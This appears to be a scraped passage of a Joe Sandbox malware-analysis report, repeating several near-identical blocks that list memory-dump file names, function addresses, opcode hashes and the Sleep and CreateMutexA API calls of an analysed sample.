Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 533a4dc379df33f9198d29b8ea72bc2e07877ef3300e96fd3b01c5bcaf0ae63d
Instruction ID: 40cc923513e906c0631145279a7eccb9d7a8f157198be32526b33b82a9fb470e
Opcode Fuzzy Hash: 533a4dc379df33f9198d29b8ea72bc2e07877ef3300e96fd3b01c5bcaf0ae63d
Instruction Fuzzy Hash: CE31F531704208DBEB1C9B68DC8DBADBBB2FB81324F24825DE064E77E5C775C9848652

Function 008C9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6e1157445398e17768bd22e88f457de19fa0fa482fc34302b03e64e9ecabf49e
Instruction ID: 41445a9ca60d30e86eadd5a3ecc331d8d235484d853508d4efa06604cdc18c43
Opcode Fuzzy Hash: 6e1157445398e17768bd22e88f457de19fa0fa482fc34302b03e64e9ecabf49e
Instruction Fuzzy Hash: D5312731714208CBEB1C9B68D889BADBBB2FB85314F20865DE068E72D5C735C9848752

Function 008CA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 82a8a93c6a335bb5d2e7ca31a5fc4b3a739a8a089eefb3627cf5c0dc1e443d69
Instruction ID: f3748c4605627ab44b30f7012aa6b6f2f51b89fbc334291f3361bacf0a3b581b
Opcode Fuzzy Hash: 82a8a93c6a335bb5d2e7ca31a5fc4b3a739a8a089eefb3627cf5c0dc1e443d69
Instruction Fuzzy Hash: AD312331714208DBEB1C9B78DC89B6DBBB2FB81318F24821DE025E73D5C736D9848652

Function 008CA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 497c311c85da136c6cacb5800c97dd1b5f7a8a8cb926948cc5eff3b764a93d83
Instruction ID: 97ca66220872f45904bccafe9a24a1a5ce93a11fef923fe6392b57ec45edd3b8
Opcode Fuzzy Hash: 497c311c85da136c6cacb5800c97dd1b5f7a8a8cb926948cc5eff3b764a93d83
Instruction Fuzzy Hash: 8B31D3317042089BEB1C9B78DC89B6DBB72FB86318F24861DE015E72D5D776C9848652

Function 008CA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219297518.0000000000B36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219327291.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219440889.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219464536.0000000000B4E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219484431.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219509909.0000000000B53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219534951.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219557860.0000000000B56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219587486.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219610716.0000000000B7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219628854.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219677522.0000000000BB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219693900.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219712263.0000000000BCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219743312.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219758879.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219773361.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219788635.0000000000BD3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219805692.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219821594.0000000000BE3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ad9304886ad71affe9ab506258b2d9e577491ee1d9f673afb1bcd5179edf4416
Instruction ID: 53a8b93e14d7b2af8448f1e6d21799197d5003f73246bb4bca04cc991bdb646b
Opcode Fuzzy Hash: ad9304886ad71affe9ab506258b2d9e577491ee1d9f673afb1bcd5179edf4416
Instruction Fuzzy Hash: EA31E4317042089BEB1C9B7CD889B6DBB72FB81318F24821DE065E72D5D776C9848656

Function 008CA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 008CA963
CreateMutexA.KERNEL32(00000000,00000000,00923254), ref: 008CA981

Memory Dump Source

Source File: 00000000.00000002.2214492721.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.2214399896.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214492721.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2214811475.0000000000929000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215630200.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215760068.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215853875.0000000000936000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2216049937.0000000000937000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217256868.0000000000A94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217292615.0000000000A96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217347320.0000000000AB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217461879.0000000000AB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217714055.0000000000AC6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217759026.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217820416.0000000000AE6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217844303.0000000000AE7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217976978.0000000000AEF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218013952.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218051712.0000000000AF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218109560.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218141604.0000000000AFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218169295.0000000000B07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218241761.0000000000B1A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218278526.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218301700.0000000000B29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218379786.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218533729.0000000000B2E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2218595001.0000000000B31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2219245988.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
